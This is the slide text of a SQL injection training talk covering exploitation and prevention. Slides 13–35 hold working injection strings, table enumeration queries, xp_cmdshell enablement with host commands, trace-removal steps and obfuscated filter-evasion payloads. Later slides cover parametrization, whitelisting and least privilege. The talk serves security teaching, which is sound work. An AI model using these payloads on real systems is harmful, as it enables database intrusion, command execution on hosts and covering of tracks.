Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23

1. Devouring Security
Sqli
Exploitation & prevention
Part 1 & 2
Marudhamaran Gunasekaran
Watch the screen recording of this presentation at
Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524
Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464

2. Security
Feeling
Reality
Trade offs
Wisdom
Ignorance is no excuse

3. Disclaimer
Techniques and Tools in this presentation
should be used or applied on an application,
only with prior consent of the application’s
owner.
Illegal otherwise.

4. Sqli – Media coverage
http://pastebin.com/HUjZPaF3

5. Sqli – Media coverage
http://thepiratebay.se/torrent/6443601

6. http://www.bloomberg.com/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.html
Sqli – Media coverage

7. http://www.eteknix.com/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/
Sqli – Media coverage

8. http://news.techworld.com/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/
Sqli – Media coverage

9. Sqli – MediaCoverage

10. Sqli – Why does it exist?
Yeah! I can develop/deploy without restrictions , I have full
access.
Thanks bro! I am your uninvited database administrator now. I owe you, and
your data.
I like them admin rights

11. Sqli – Why does it exist?
Conglomeration of Sensitive Data
Would you keep all your belongings in your home, or would you keep some in your
safe deposit box?
Blindly Trusting Unsanitized User Input
"Over thousands of queries in a moderate- to large-size application, that 2% can result
in a handful of SQL injections," Chou says. "All an attacker needs to do is find one
of these, and you'll have millions of records stolen and a headline in Dark
Reading.“

12. Sqli – Why does it exist?
• It’s not always about a developer knowing
better,
there are tons and tons of legacy code
• Remember, DBA’s write SQL too
• No strict access control policies
• Windows based/Desktop based applications
are directly ported to the web
• Developer’s still don’t know the complete
truths about Sqli

13. Sqli 101
../Products?name=rat
SELECT 1 FROM Products WHERE ProductName
= ‘rat‘
../Products?name=rat‘ or 1=1 -SELECT 1 FROM Products WHERE ProductName
= ‘rat’ or 1=1 -- ’
or true

14. Sqli 101
• http://sqli:8020/Sqli/
• http://localhost/WebGoat/attack?
Screen=147&menu=1100&stage=1

15. Sqli U

16. Sqli U
http://sqli:8020/Sqli/ProductSearch

17. Sqli E

18. Sqli E
http://sqli:8020/SqliErrorRiddle/

19. Sqli E
-- table enumerator
SELECT TOP 1 Convert(INT, NAME)
FROM sys.tables
WHERE object_id = (
SELECT TOP 1 object_id
FROM (
SELECT TOP 2 object_id
FROM sys.tables
ORDER BY object_id
) AS TEMP
ORDER BY object_id DESC
)
Enumerating in MySQl is very easy with OFFSET.

20. ORMs and SPs Loopholes
http://sqli:8020/SqliORM/ProductSearch

21. It’s not an ORM’s problem to have
you loaded with features
ALTER PROCEDURE SearchProducts (@Item VARCHAR(100))
AS
BEGIN
DECLARE @query VARCHAR(400)
SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%'''
PRINT @query
EXEC (@query)
END
GO
---------------------------------------------------------------------------------------------- Execute good
EXEC SearchProducts 'chai'
GO
-- Execute bad
EXEC SearchProducts 'chai%'' or 1=1--'
GO

22. Fixing SP Loopholes
ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200))
AS
BEGIN
DECLARE @safequery NVARCHAR(400)
DECLARE @params NVARCHAR(200)
SET @safequery = N'SELECT * FROM Products WHERE
ProductName LIKE ''%'' + @param1 + ''%'''
SET @params = N'@param1 NVARCHAR(200)‘;
EXECUTE SP_EXECUTESQL @safequery
,@params
,@param1 = @Item
END
GO
---------------------------------------------------------------------------------------------- Execute bad
EXEC SearchProductsBetter 'chai%'' or 1=1--'
GO

23. Profiling Host OS
• Privilege misuse and rooting

24. Profiling Host OS
-- enable command shell
EXEC sp_configure 'show advanced options',
1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE;
-- disable command shell
EXEC sp_configure 'show advanced options',
1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 0;RECONFIGURE;

25. Profiling Host OS
-- play time!
exec xp_cmdshell 'tasklist‘
exec master.dbo.xp_cmdshell 'whoami‘
exec xp_cmdshell 'netsh advfirewall firewall
show rule name=all profile=public'

26. Profiling Host OS
-- enumerate and remove trace
create table tempsz(temp varchar(MAX));insert into tempsz exec
xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz;
-- enumerate and leave trace
create table tempsz(temp varchar(MAX));insert into tempsz exec
xp_cmdshell 'tasklist';
-- get enumerated information and remove trace
select temp from tempsz;drop table tempsz;

27. Profiling Host OS
-- schedule a shutdown and send message to the user named
maran
exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg
maran You will be shut down in 100 minutes'
-- abort the shutdown and send message to the user named
maran
exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I
have heard your prayer. You are salvaged'

28. Profiling Host OS
OSCommand_Run in Oracle does the equivalent of xp_cmdshell
in Sql server.

29. Sqli T
Just biding time, my friend

30. Sqli T
Oracle
DBMS_LOCK.sleep
TSql
WAIT FOR DELAY
MySql
BENCHMARK

31. Sqli B
Blind, but I could
get by

32. Sqli B
Blind, not as fast,
but I could travel
miles

33. IDS Evasive Techniques
‘485’=“485”
‘5’>’1’
“QSNR”=“QSNR”
REPLACE('SEL/**/CT', '/**/', '')

34. Blacklist Filter Evasion
';exec xP_cMdsheLL 'dir';-';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions]
';exec/**/xp_cmdshell/**/'dir';-';Declare @cmd as varchar(3000);Set @cmd =
'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';e
xec(@cmd);--

35. Blacklist Filter Evasion
Declare @cmd as varchar(3000);Set @cmd
=(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+C
HAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR
(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)
+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+C
HAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(
@cmd);--
EXEC (exec master..xp_cmdshell 'dir')

36. Sqli Exploitation tools
• Sqlmap
• sqlninja
• Safe3SI
• Enema
• Havij
• Pangolin
• BSQL Hacker
……………………. and a lot more

37. Sqli Exploitation tools
Demonstration
1.Safe3SI
2.Enema
3.Sqlmap

38. Sqli Feeble Fixes
Blacklisting is suicide
IDSs are not very effective for Sqli

39. Feeble Fixes
Blacklisting
(can’t filter all possible dangerous inputs like
below)
“QSNR”=“QSNR”
REPLACE('SEL/**/CT', '/**/', '')

40. Blacklisting for Death

41. Blacklisting for Death

42. Blacklisting for Death

44. Sqli Prevention

45. Sqli Prevention
Exploitation tools
Fuzzers
Active/Passive vulnerability scanners

46. Core Defense
Input Validation with Whitelist, Type casting
or/and RegEx.

47. Core Defense
Validation with RegEx

48. Core Defense
CREATE PROCEDURE dbo.doQuery (@id NCHAR(4))
AS
DECLARE @query NCHAR(64)
IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]'
BEGIN
SELECT @query = 'select ccnum from cust where id = ''' + @id + ''''
EXEC @query
END
RETURN
-- Or, better yet, force an interger parameter
CREATE PROCEDURE dbo.doQuery(@id smallint)

49. Core Defense
Parametrization a.k.a prepared statements
[refer to your framework for support]

50. Core Defense
Encrypt data to prevent disclosure when physical
database files are stolen.
1. Encryption does not do a darn thing to protect
you from direct Sqli
2. Encryption only protects you from Sqli induced
attacks

51. Core Defense
Database user account audits
1. Selective privilege principle
2. Least privilege principle

52. Code Reviews - Spot and Stop Sqli

53. Code Reviews - Spot and Stop Sqli

54. CAT.Net Sqli Scan

55. CAT.Net Sqli Scan
MicrosoftACECodeAnalysisReport.htm

56. Netsparker community edition

57. What now?
Sqli Cheatsheet http://ferruh.mavituna.com/sql-injectioncheatsheet-oku
Dynamic queries in T-SQL http://www.sommarskog.se/dyn-search2005.html
http://www.sommarskog.se/dyn-search2008.html

58. End of the world
Watch the screen recording of this presentation
at my vimeo channel
Devouring Security – Sql Injection Part 1 http://vimeo.com/83658524
Devouring Security – Sql Injection Part 2 –
http://vimeo.com/85256464